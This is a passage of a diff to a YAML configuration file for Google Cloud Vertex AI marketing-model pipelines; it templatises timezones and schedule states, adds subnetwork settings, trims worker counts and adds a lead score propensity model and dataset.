CALL `{lead_score_propensity_inference_preparation_procedure_name}`();" + # The query_lead_score_propensity_training_preparation defines the procedure that will be used to invoke the creation of the lead score propensity training preparation table. + query_lead_score_propensity_training_preparation: " + CALL `{lead_score_propensity_training_preparation_procedure_name}`();" + timeout: 3600.0 + pipeline_parameters_substitutions: # Substitutions are applied to the parameters before compilation + lead_score_propensity_label_procedure_name: "${project_id}.feature_store.invoke_lead_score_propensity_label" + user_dimensions_procedure_name: "${project_id}.feature_store.invoke_user_dimensions" + user_rolling_window_metrics_procedure_name: "${project_id}.feature_store.invoke_user_rolling_window_lead_metrics" + user_scoped_metrics_procedure_name: "${project_id}.feature_store.invoke_user_scoped_metrics" + user_session_event_aggregated_metrics_procedure_name: "${project_id}.feature_store.invoke_user_session_event_aggregated_metrics" + date_timezone: "UTC" # used when input_date is None and need to get current date. + lead_score_propensity_inference_preparation_procedure_name: "${project_id}.lead_score_propensity.invoke_lead_score_propensity_inference_preparation" + lead_score_propensity_training_preparation_procedure_name: "${project_id}.lead_score_propensity.invoke_lead_score_propensity_training_preparation" # This pipeline contains the configuration parameters for the value based bidding training and inference pipelines. # To deploy this pipeline to your Google Cloud project: @@ -521,11 +614,17 @@ vertex_ai: type: "tabular-workflows" schedule: # define the schedule for the pipeline - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". 
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.value_based_bidding.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -559,14 +658,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.aggregated_vbb.aggregated_value_based_bidding_training" data_source_bigquery_table_schema: "../sql/schema/table/value_based_bidding_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -596,11 +700,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.value_based_bidding.explanation.schedule.state} pipeline_parameters: project: "${project_id}" location: "${cloud_region}" @@ -635,11 +745,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 8 * * SAT" + cron: "TZ=${time_zone} 0 8 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". 
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.purchase_propensity.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -681,14 +797,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.purchase_propensity.v_purchase_propensity_training_30_15_last_window" data_source_bigquery_table_schema: "../sql/schema/table/purchase_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -730,11 +851,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.purchase_propensity.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${cloud_region}" @@ -762,7 +889,7 @@ vertex_ai: positive_label: "1" # THese are parameters to trigger the Activation Application Dataflow. pubsub_activation_topic: "activation-trigger" - pubsub_activation_type: "purchase-propensity-30-15" # purchase-propensity-30-15 | purchase-propensity-15-15 | purchase-propensity-15-7" + pubsub_activation_type: "purchase-propensity-vbb-30-15" # purchase-propensity-30-15 | purchase-propensity-vbb-30-15 | purchase-propensity-15-15 | purchase-propensity-15-7" pipeline_parameters_substitutions: null # This pipeline contains the configuration parameters for the churn propensity training and inference pipelines for the churn propensity model. @@ -785,11 +912,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. 
BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 8 * * SAT" + cron: "TZ=${time_zone} 0 8 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.churn_propensity.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -831,14 +966,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.churn_propensity.v_churn_propensity_training_30_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/churn_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -880,11 +1020,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.churn_propensity.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${cloud_region}" @@ -935,11 +1083,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). 
type: "custom" schedule: - cron: "TZ=America/New_York 0 12 * * SAT" + cron: "TZ=${time_zone} 0 12 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.segmentation.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be compiled # For Demographics Audience Segmentation model, we use the BQML KMeans clustering algorithm. # Check the official documentation for better understanding the algorithm @@ -978,11 +1134,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 7 * * *" + cron: "TZ=${time_zone} 0 7 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.segmentation.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -1024,11 +1188,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 12 * * SAT" + cron: "TZ=${time_zone} 0 12 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.auto_segmentation.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be compiled # For Interest based Auto Audience Segmentation model, we use the BQML KMeans clustering algorithm. # Check the official documentation for better understanding the algorithm @@ -1066,11 +1238,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). 
type: "custom" schedule: - cron: "TZ=America/New_York 0 7 * * *" + cron: "TZ=${time_zone} 0 7 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.auto_segmentation.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -1115,11 +1295,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 16 * * SAT" + cron: "TZ=${time_zone} 0 16 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.propensity_clv.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -1160,14 +1348,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.purchase_propensity.v_purchase_propensity_training_30_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/purchase_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -1226,11 +1419,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). 
type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 20 * * SAT" + cron: "TZ=${time_zone} 0 20 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.clv.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -1268,14 +1469,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.customer_lifetime_value.v_customer_lifetime_value_training_180_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/customer_lifetime_value_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -1314,11 +1520,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 6 * * *" + cron: "TZ=${time_zone} 0 6 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.clv.prediction.schedule.state} # These are the pipeline parameters to be used in this convoluted prediction pipeline that takes predictions from LTV model and purchase propensity model. 
pipeline_parameters: project_id: "${project_id}" @@ -1342,7 +1556,7 @@ vertex_ai: # The `purchase_model_metric_threshold` parameter defines what is the maximum acceptable value for the `purchase_model_metric_name` so that the model can be selected. # If the actual models metrics values are higher than this limit, no models will be selected and the pipeline is going to fail. clv_model_metric_name: "meanAbsoluteError" #'rootMeanSquaredError', 'meanAbsoluteError', 'meanAbsolutePercentageError', 'rSquared', 'rootMeanSquaredLogError' - clv_model_metric_threshold: 400 + clv_model_metric_threshold: 600 number_of_clv_models_considered: 1 # This is the prediction dataset table or view for the purchase model. purchase_bigquery_source: "${project_id}.purchase_propensity.v_purchase_propensity_inference_30_30" @@ -1363,6 +1577,173 @@ vertex_ai: pubsub_activation_type: "cltv-180-30" # cltv-180-180 | cltv-180-90 | cltv-180-30 pipeline_parameters_substitutions: null + # This pipeline contains the configuration parameters for the training and inference pipelines of the lead score propensity model. + # To deploy this pipeline to your Google Cloud project: + ## 1. Define the pipeline parameters below, following the YAML format. + ## 2. Define the BigQuery or Vertex AI KFP components to be used by your pipeline in the `python/pipelines` section, if applicable. + ## 3. Define or reuse the pipeline definition method to be used to compile the pipeline into a YAML file in the `python/pipelines` section. + ## 4. Create the terraform resources to compile, upload and schedule the pipeline in `terraform/pipelines/pipelines.tf`. + ## 5. Note that the Python functions that perform `compilation` and `upload to GCS bucket` are defined in `python/pipelines/compiler.py` and `python/pipelines/uploader.py`. + ## 6. Note that the Python function that performs the `schedule` of the pipeline is defined in `python/pipelines/scheduler.py`. + ## 7. Run terraform apply. + ## Note: For `type` = "tabular workflows", the pre-compiled YAML file `automl_tabular_pl_v4.yaml` is recompiled by parsing the `pipeline_parameters` below as default values + ## to the new YAML file. The recompiled YAML will be uploaded and scheduled in Vertex AI Pipelines. + lead_score_propensity: + training: + name: "lead-score-propensity-training-pl" + job_id_prefix: "lead-score-propensity-training-pl-" + experiment_name: "lead-score-propensity-training" + # `type` can be "custom" or "tabular-workflows". + # For using Vertex AI Tabular Workflow use the latter, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). + type: "tabular-workflows" + schedule: + cron: "TZ=${time_zone} 0 8 * * SAT" + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default".
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.lead_score_propensity.training.schedule.state} + # These are pipeline parameters that will be passed to the pipeline to be recompiled + pipeline_parameters: + project: "${project_id}" + location: "${cloud_region}" + root_dir: "gs://${project_id}-pipelines/lead-score-propensity-training" + transformations: "gs://${project_id}-pipelines/lead-score-propensity-training/transformations_config_{timestamp}.json" + # These are specific data types transformations that will be applied to the dataset. + custom_transformations: "pipelines/transformations-lead-score-propensity.json" + train_budget_milli_node_hours: 100 # 1000 = 1 hour + # Set these to apply feature selection tuning. + max_selected_features: 20 + apply_feature_selection_tuning: true + run_evaluation: true + run_distillation: false + # The Lead Score Propensity model name + model_display_name: "lead-score-propensity-model" + # The Lead Score Propensity model description + model_description: "Lead Score Propensity Classification AutoML Model" + # Use `prediction_type` to "regression" for training models that predict a numerical value. For classification models, use "classification" and you will + # also get the probability likelihood for that class. + prediction_type: "classification" + # The optimization objectives may change depending on the `prediction_type`. + # For binary classification, use "maximize-au-roc", "minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall" or "maximize-recall-at-precision". + # For multi class classification, use "minimize-log-loss". + # For regression, use "minimize-rmse", "minimize-mae", or "minimize-rmsle". + optimization_objective: "maximize-au-roc" # maximize-precision-at-recall, maximize-au-prc, maximize-au-roc, minimize-log-loss, maximize-recall-at-precision + #Don't use when parameter `optimization_objective` is not `maximize-precision-at-recall` or `maximize-recall-at-precision` + #optimization_objective_recall_value: 0.72 + #optimization_objective_precision_value: 0.72 + target_column: "will_login" + predefined_split_key: "data_split" + data_source_csv_filenames: null + training_fraction: null + validation_fraction: null + test_fraction: null + # This is the training dataset provided during the training routine. + # The schema in this table or view must match the schema in the json files. + # Take into consideration the `excluded_features` list below. They won't be used for training. 
+ data_source_bigquery_table_path: "bq://${project_id}.lead_score_propensity.v_lead_score_propensity_training_5_1_last_window" + data_source_bigquery_table_schema: "../sql/schema/table/lead_score_propensity_training_preparation.json" + dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 + evaluation_dataflow_disk_size_gb: 30 + stats_and_example_gen_dataflow_disk_size_gb: 30 + transform_dataflow_disk_size_gb: 30 + timestamp_split_key: null + stratified_split_key: null + weight_column: null + additional_experiments: null + export_additional_model_without_custom_ops: false + # Override the study spec parameters in case you want to restrict hyperparameter search space. Including `model_type`. + # In this case, for Value Based Bidding, we're looking for a perfect fit using a tree based model. + # Don't use when parameter `apply_feature_selection_tuning` is `true` + #study_spec_parameters_override: + # - parameter_id: "model_type" + # categorical_value_spec: + # values: + # - nn + # - boosted_trees + # - parameter_id: "feature_selection_rate" + # double_value_spec: + # min_value: 0.5 + # max_value: 1.0 + # scale_type: UNIT_LINEAR_SCALE + # Features to be excluded from the training dataset. + exclude_features: + - processed_timestamp + - data_split + #- feature_date + - user_pseudo_id + - user_id + - device_web_browser_version + - device_os_version + - will_login + pipeline_parameters_substitutions: null + prediction: + name: "lead-score-propensity-prediction-pl" + job_id_prefix: "lead-score-propensity-prediction-pl-" + experiment_name: "lead-score-propensity-prediction" + # `type` can be "custom" or "tabular-workflows". + # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). + type: "custom" + schedule: + cron: "TZ=${time_zone} 0 5 * * *" + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.lead_score_propensity.prediction.schedule.state} + pipeline_parameters: + project_id: "${project_id}" + location: "${cloud_region}" + job_name_prefix: "lead-score-propensity-prediction-pl-" + # The Lead Score Propensity model name to be used for prediction + model_display_name: "lead-score-propensity-model" + model_metric_name: "logLoss" + # The `model_metric_threshold` parameter defines what is the maximum acceptable value for the `model_metric_name` so that the model can be selected. + # If the actual models metrics values are higher than this limit, no models will be selected and the pipeline is going to fail. 
+ model_metric_threshold: 0.9 + number_of_models_considered: 1 + # This is the prediction dataset table or view. + bigquery_source: "${project_id}.lead_score_propensity.v_lead_score_propensity_inference_5_1" + bigquery_destination_prefix: "${project_id}.lead_score_propensity" + bq_unique_key: "user_pseudo_id" + machine_type: "n1-standard-4" + max_replica_count: 10 + batch_size: 64 + accelerator_count: 0 + accelerator_type: "ACCELERATOR_TYPE_UNSPECIFIED" # ONE OF ACCELERATOR_TYPE_UNSPECIFIED, NVIDIA_TESLA_K80, NVIDIA_TESLA_P100, NVIDIA_TESLA_V100, NVIDIA_TESLA_P4, NVIDIA_TESLA_T4 + generate_explanation: false + # This is the probability value that will tell the condition to split into the two classes. + # For probabilities higher than `threashold`, set the positive label to 1, otherwise 0. + threashold: 0.5 + positive_label: "1" + # These are parameters to trigger the Activation Application Dataflow. + pubsub_activation_topic: "activation-trigger" + pubsub_activation_type: "lead-score-propensity-5-1" # lead-score-propensity-5-1 + pipeline_parameters_substitutions: null + # This pipeline contains the configuration parameters for the feature creation pipeline for the audience segmentation model. # This block defines the pipeline parameters that are going to be used for three tasks: compilation, upload and scheduling. # To deploy this pipeline to your Google Cloud project: @@ -1392,14 +1773,20 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 8-23/2 * * *" + cron: "TZ=${time_zone} 0 8-23/2 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false # The `state` defines the state of the pipeline. # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + state: ${pipeline_configuration.reporting_preparation.execution.schedule.state} # possible states ACTIVE or PAUSED # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -1450,14 +1837,20 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 8 * * *" + cron: "TZ=${time_zone} 0 8 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default".
+ # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false # The `state` defines the state of the pipeline. # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + state: ${pipeline_configuration.gemini_insights.execution.schedule.state} # possible states ACTIVE or PAUSED # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -1586,6 +1979,18 @@ bigquery: description: "Dataset with gemini_insights results from multiple use cases" friendly_name: "Gemini Insights Dataset" max_time_travel_hours: 168 + # Dataset for the lead score propensity use case. + lead_score_propensity: + name: "lead_score_propensity" + location: "${location}" + project_id: "${project_id}" + collation: "und:ci" + is_case_insensitive: TRUE + description: "Lead Score Propensity Use Case dataset for Marketing behavioural modeling" + friendly_name: "Lead Score Propensity Dataset" + max_time_travel_hours: 168 + default_partition_expiration_days: 365 + default_table_expiration_days: 365 table: # Table containing the feature engineered dataset that will be used for the Audience Segmentation prediction pipeline. audience_segmentation_inference_preparation: @@ -1622,6 